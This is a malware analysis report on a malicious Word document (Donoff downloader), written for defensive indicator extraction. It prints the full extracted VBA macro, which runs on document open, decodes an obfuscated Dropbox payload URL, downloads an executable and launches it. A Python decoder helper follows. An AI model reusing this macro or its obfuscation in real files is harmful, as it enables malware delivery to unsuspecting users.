Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e17d8c4c4f3eca5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.5 KB
Created: 2015-08-20 22:03:00
Authoring application: Microsoft Office Word
First seen: 2015-10-05
MD5: de58521ab534004dbcf7f01780f72ed0
SHA-1: 6c321c0f5ee257382abf121996ae345635bace55
SHA-256: 7e17d8c4c4f3eca5302ba1bf6441e5dab3013aecfee3bae1f051971dc0c48d15
Risk score: 258

Heuristics (8)

  • ClamAV: Doc.Downloader.Donoff-6700491-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
    The string "URLDownloadToFileA" appears in the file; it is the urlmon export the macro declares and calls to fetch the payload.
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    Matched line in script:
    "URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    The macro runs automatically when the document is opened (once macros are enabled); it is the entry point that calls the downloader routine.
    Matched line in script:
    Private Sub Document_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Reads %tmp% to build the drop path for the downloaded payload. Caveat: the filename concatenated here is Decrypt("fyf/opd"), which decodes to con.exe. CON is a reserved Win32 device name and a base name equal to a reserved name is treated as the device regardless of extension, so %tmp%\con.exe is not a regular file path and the download-then-execute chain is unlikely to work as written on a stock Windows install. Expect dynamic analysis to show the download attempt but no payload execution.
    Matched line in script:
    urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
    The string "ShellExecuteA" appears in the file; it is the shell32 export the macro declares and calls with the "open" verb to launch the dropped file.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (label: referenced by macro)
    Caveat: this is the standard OOXML DrawingML namespace identifier and is benign. The real download URL does not appear in cleartext anywhere in the file: the macro obfuscates it with Decrypt() (reverse the string, then subtract 1 from each character code) and only reconstructs it at run time. Decoding the second Decrypt("...") literal in the extracted source yields hxxps://www[.]dropbox[.]com/s/yn9a9nr3k55p0th/hov.exe?dl=0, which is the indicator to block, not the schema URL above.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1757 bytes
SHA-256: 77c76e7ed1155da08975437878ecb99f66830722fd1a3e38e8320fccca2b647a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: LcIOiqfKGGEJvo

Private Declare PtrSafe Function pnUJeULYkSR Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal ubvAIye As Long, ByVal nnm As String, _
ByVal rNUcGTSjmphF As String, ByVal UNxgiCfkxudqPP As String, ByVal rzMoHnLdDdoiAkG As String, ByVal qBHDOg As Long) As Long

Private Declare PtrSafe Function WSHcSJWhQPDpQnzNvMyC Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _
ByVal KRwJIYdfWwL As String, ByVal DoVXsUZnyMZMzbxvXFWIM As Long, ByVal nMXRkhEZyrnyPeznxUPt As Long) As Long

Private Sub LcIOiqfKGGEJvo()
Dim JkjzpsjIlQOwlFvmAKt As String, tggHPdEYDctF As String, urlDAWGRXTfwxSUeBi As String, vZAmBFIAYChQMBVL As String, CQbJJwjKht As String, HpGswVKHBT As String
tggHPdEYDctF = Decrypt("fyf/opd")
urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF


JkjzpsjIlQOwlFvmAKt = Decrypt("1>me@fyf/wpi0iu1q66l4so:b:oz0t0npd/ypcqpse/xxx00;tquui")

WSHcSJWhQPDpQnzNvMyC 0, JkjzpsjIlQOwlFvmAKt, urlDAWGRXTfwxSUeBi, 0, 0
pnUJeULYkSR 0, "open", urlDAWGRXTfwxSUeBi, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

LcIOiqfKGGEJvo
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function


Attribute VB_Name = "NewMacros"
Sub autopen()
'
' autopen Macro
'
'

End Sub
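The Decrypt() routine above is the only thing standing between the analyst and the sample's indicators, so the following is an added analysis helper (not part of the sample, and not code from the report's tooling): a Python port of Decrypt(), a regex pass that applies it to every Decrypt("...") literal in the extracted source, and a check for the reserved-device-name problem in the decoded drop filename. The MACRO_SOURCE excerpt is constructed here by copying the relevant lines from the macros.bas listing so the script runs offline; the defang() helper and the regex are assumptions of this example, not of the report.

```python
"""Decode the string obfuscation used by the Decrypt() routine in macros.bas.

The VBA does StrReverse(enc) and then Chr(Asc(x) - 1) per character, so the
inverse is: walk the literal backwards and decrement every character code.
Added analysis helper; not part of the sample or of the report tooling.
"""
import re

# Constructed excerpt, copied from the extracted macro listing above, so the
# decoder has realistic input without touching the real sample.
MACRO_SOURCE = r'''
tggHPdEYDctF = Decrypt("fyf/opd")
urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF
JkjzpsjIlQOwlFvmAKt = Decrypt("1>me@fyf/wpi0iu1q66l4so:b:oz0t0npd/ypcqpse/xxx00;tquui")
'''

# Win32 reserved device names. A path whose base name (before the first dot)
# matches one of these is treated as the device, whatever the extension, so
# "%tmp%\con.exe" is the console device rather than a regular file.
RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Matches the macro's Decrypt("<literal>") call sites.
DECRYPT_CALL = re.compile(r'Decrypt\("([^"]*)"\)')


def vba_decrypt(enc: str) -> str:
    """Port of the macro's Decrypt(): StrReverse, then Chr(Asc(x) - 1)."""
    return "".join(chr(ord(c) - 1) for c in reversed(enc))


def vba_encrypt(plain: str) -> str:
    """Inverse of vba_decrypt(), used to confirm the port round-trips."""
    return "".join(chr(ord(c) + 1) for c in reversed(plain))


def extract_decrypted_strings(source: str) -> list[str]:
    """Decode every Decrypt("...") literal in the given VBA source, in order."""
    return [vba_decrypt(m.group(1)) for m in DECRYPT_CALL.finditer(source)]


def is_reserved_device_name(path: str) -> bool:
    """True if the file's base name is a Win32 reserved device name."""
    base = path.rsplit("\\", 1)[-1].split(".", 1)[0]
    return base.upper() in RESERVED_DEVICE_NAMES


def defang(indicator: str) -> str:
    """Make a decoded URL/filename safe to paste into a report."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    decoded = extract_decrypted_strings(MACRO_SOURCE)
    for value in decoded:
        print(defang(value))
    drop_name = decoded[0]
    print("drop filename is a reserved device name:",
          is_reserved_device_name(drop_name))
```

Run stand-alone, the script prints the two decoded literals defanged: the drop filename con.exe and the Dropbox payload URL; the last line reports that con.exe collides with the CON device name, which is why the sample's download-and-run chain is unlikely to succeed on a real host even though the macro itself is clearly malicious. The same decoder works on any other Donoff-style sample that uses the reverse-then-shift-by-one scheme; the regex assumes the call sites look exactly like the ones in this listing.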